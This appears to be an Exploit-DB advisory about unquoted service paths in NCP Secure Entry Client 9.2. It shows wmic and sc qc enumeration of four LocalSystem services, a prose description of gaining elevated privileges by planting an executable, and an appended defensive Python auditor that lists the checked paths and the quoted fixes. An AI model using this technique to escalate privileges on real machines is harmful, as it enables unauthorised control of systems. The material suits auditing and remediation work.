NCP_Secure_Entry_Client 9.2 – Unquoted Service Paths

  • Author: Akif Mohamed Ik
    Date: 2019-11-18
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/47668/
  • # Exploit Title: NCP_Secure_Entry_Client 9.2 - Unquoted Service Paths
    # Date: 2019-11-17
    # Exploit Author: Akif Mohamed Ik
    # Vendor Homepage: http://software.ncp-e.com/
    # Software Link: http://software.ncp-e.com/NCP_Secure_Entry_Client/Windows/9.2x/
    # Version: 9.2x
    # Tested on: Windows 7 SP1
    # CVE : NA
    C:\Users\user>wmic service get name, displayname, pathname, startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """
    
    ncprwsnt  ncprwsnt  C:\Program Files (x86)\NCP\SecureClient\ncprwsnt.exe  Auto
    rwsrsu    rwsrsu    C:\Program Files (x86)\NCP\SecureClient\rwsrsu.exe    Auto
    ncpclcfg  ncpclcfg  C:\Program Files (x86)\NCP\SecureClient\ncpclcfg.exe  Auto
    NcpSec    NcpSec    C:\Program Files (x86)\NCP\SecureClient\NCPSEC.EXE    Auto
    						 
    C:\Users\ADMIN>sc qc ncprwsnt					 
    [SC] QueryServiceConfig SUCCESS	
    		SERVICE_NAME: ncprwsnt
    TYPE : 10WIN32_OWN_PROCESS
    START_TYPE : 2 AUTO_START
    ERROR_CONTROL: 1 NORMAL
    BINARY_PATH_NAME : C:\Program Files (x86)\NCP\SecureClient\ncprwsnt.exe
    LOAD_ORDER_GROUP :
    TAG: 0
    DISPLAY_NAME : ncprwsnt
    DEPENDENCIES :
    SERVICE_START_NAME : LocalSystem
    
    C:\Users\ADMIN>sc qc rwsrsu
    [SC] QueryServiceConfig SUCCESS
    
    SERVICE_NAME : rwsrsu
    TYPE : 110  WIN32_OWN_PROCESS (interactive)
    START_TYPE : 2 AUTO_START
    ERROR_CONTROL: 1 NORMAL
    BINARY_PATH_NAME : C:\Program Files (x86)\NCP\SecureClient\rwsrsu.exe
    LOAD_ORDER_GROUP :
    TAG: 0
    DISPLAY_NAME : rwsrsu
    DEPENDENCIES :
    SERVICE_START_NAME : LocalSystem
    		
    C:\Users\ADMIN>sc qc ncpclcfg
    [SC] QueryServiceConfig SUCCESS
    
    SERVICE_NAME : ncpclcfg
    TYPE : 110  WIN32_OWN_PROCESS (interactive)
    START_TYPE : 2 AUTO_START
    ERROR_CONTROL: 1 NORMAL
    BINARY_PATH_NAME : C:\Program Files (x86)\NCP\SecureClient\ncpclcfg.exe
    LOAD_ORDER_GROUP :
    TAG: 0
    DISPLAY_NAME : ncpclcfg
    DEPENDENCIES :
    SERVICE_START_NAME : LocalSystem		
    		
    C:\Users\ADMIN>sc qc NcpSec
    [SC] QueryServiceConfig SUCCESS
    
    SERVICE_NAME : NcpSec
    TYPE : 110  WIN32_OWN_PROCESS (interactive)
    START_TYPE : 2 AUTO_START
    ERROR_CONTROL: 1 NORMAL
    BINARY_PATH_NAME : C:\Program Files (x86)\NCP\SecureClient\NCPSEC.EXE
    LOAD_ORDER_GROUP :
    TAG: 0
    DISPLAY_NAME : NcpSec
    DEPENDENCIES :
    SERVICE_START_NAME : LocalSystem
    		
    #Exploit:
    
    A successful attempt would require the local user to be able to insert
    their code in the system root path undetected by the OS or other
    security applications where it could potentially be executed during
    application startup or reboot. If successful, the local user's code
    would execute with the elevated privileges of the application.
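
An added audit example (not part of the original advisory, and not NCP's code): the Python below parses `sc qc` output and, for each unquoted `BINARY_PATH_NAME` containing spaces, lists the earlier locations that the documented `CreateProcess` parsing of an unquoted command line tries, so they can be checked for absence and for write access by standard users, together with the quoted value that corrects the service. The `QuotedSvc` and `NoSpaceSvc` entries and all function names are constructed for illustration.

```python
import re

# Constructed sample: two BINARY_PATH_NAME values from the `sc qc` output above,
# plus a quoted and a space-free path (both hypothetical) for contrast.
SAMPLE = r'''
SERVICE_NAME: ncprwsnt
BINARY_PATH_NAME : C:\Program Files (x86)\NCP\SecureClient\ncprwsnt.exe
SERVICE_NAME : NcpSec
BINARY_PATH_NAME : C:\Program Files (x86)\NCP\SecureClient\NCPSEC.EXE
SERVICE_NAME : QuotedSvc
BINARY_PATH_NAME : "C:\Program Files\Example\svc.exe" -k run
SERVICE_NAME : NoSpaceSvc
BINARY_PATH_NAME : C:\Tools\svc.exe
'''

def parse_sc_qc(text):
    """Map SERVICE_NAME -> BINARY_PATH_NAME from concatenated `sc qc` output."""
    services, name = {}, None
    for line in text.splitlines():
        key, _, value = line.partition(":")   # splits before the drive colon
        if key.strip() == "SERVICE_NAME":
            name = value.strip()
        elif key.strip() == "BINARY_PATH_NAME" and name:
            services[name] = value.strip()
    return services

def split_image_path(binary_path):
    """Return (executable, arguments) for an unquoted value, None if quoted."""
    if binary_path.startswith('"'):
        return None
    m = re.match(r"(.*?\.exe)(\s.*|$)", binary_path, re.IGNORECASE)
    return (m.group(1), m.group(2)) if m else (binary_path, "")

def search_order(exe):
    """Locations tried before the real binary: every prefix ending at a space,
    with .exe appended when that prefix has no extension."""
    out = []
    for i, ch in enumerate(exe):
        if ch == " ":
            prefix = exe[:i]
            leaf = prefix.rsplit("\\", 1)[-1]
            out.append(prefix if "." in leaf else prefix + ".exe")
    return out

def audit(text):
    """Return {service: {"check": [paths to verify], "fix": quoted value}}."""
    findings = {}
    for name, path in parse_sc_qc(text).items():
        parts = split_image_path(path)
        if parts and " " in parts[0]:
            findings[name] = {"check": search_order(parts[0]),
                              "fix": f'"{parts[0]}"{parts[1]}'}
    return findings
```

The `fix` string is the value to store as the service's `ImagePath`; each `check` entry should not exist, and its parent directory should not be writable by non-administrators.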